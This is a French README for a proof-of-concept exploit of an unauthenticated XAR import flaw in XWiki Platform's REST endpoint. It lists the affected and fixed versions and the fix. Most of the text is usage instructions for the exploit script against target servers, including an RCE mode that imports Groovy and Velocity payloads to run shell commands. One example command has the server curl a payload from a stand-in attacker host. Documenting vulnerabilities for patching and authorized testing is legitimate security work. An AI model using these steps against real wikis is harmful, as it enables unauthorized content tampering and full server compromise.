
# XWiki Platform - PoC CVE-2026-33137 - Import XAR non authentifié via REST /wikis/{wikiName}
XWiki Platform - Import XAR non authentifié via REST /wikis/{wikiName}
Le point d'accès REST POST /wikis/{wikiName} de XWiki Platform exécute une importation XAR (XWiki Archive) sans effectuer aucune vérification d'authentification ou d'autorisation. Un attaquant non authentifié peut créer ou mettre à jour des documents arbitraires dans le wiki cible en envoyant un fichier XAR spécialement conçu.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Statut | Versions |
|---|
| Vulnérable | > 15.10.16, > 16.4.6, > 16.10.2 |
| Corrigé | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Un attaquant non authentifié peut :
Le point d'accès REST POST /xwiki/rest/wikis/{wikiName} accepte un fichier XAR dans le corps de la requête et l'importe directement dans le wiki sans vérifier si le demandeur a les droits ADMIN. Le correctif (commit 4b7b95b) ajoute une vérification d'autorisation utilisant ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)Le paramètre --rce importe des pages contenant des payloads Groovy et Velocity qui exécutent la chaîne de commande spécifiée. Il automatise :
{{groovy}} et {{velocity}}Prérequis pour une RCE réussie :
-u / --password)package.xml - descripteur du package{Space}/{Page}.xml - document XML avec contenuCe PoC est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce logiciel.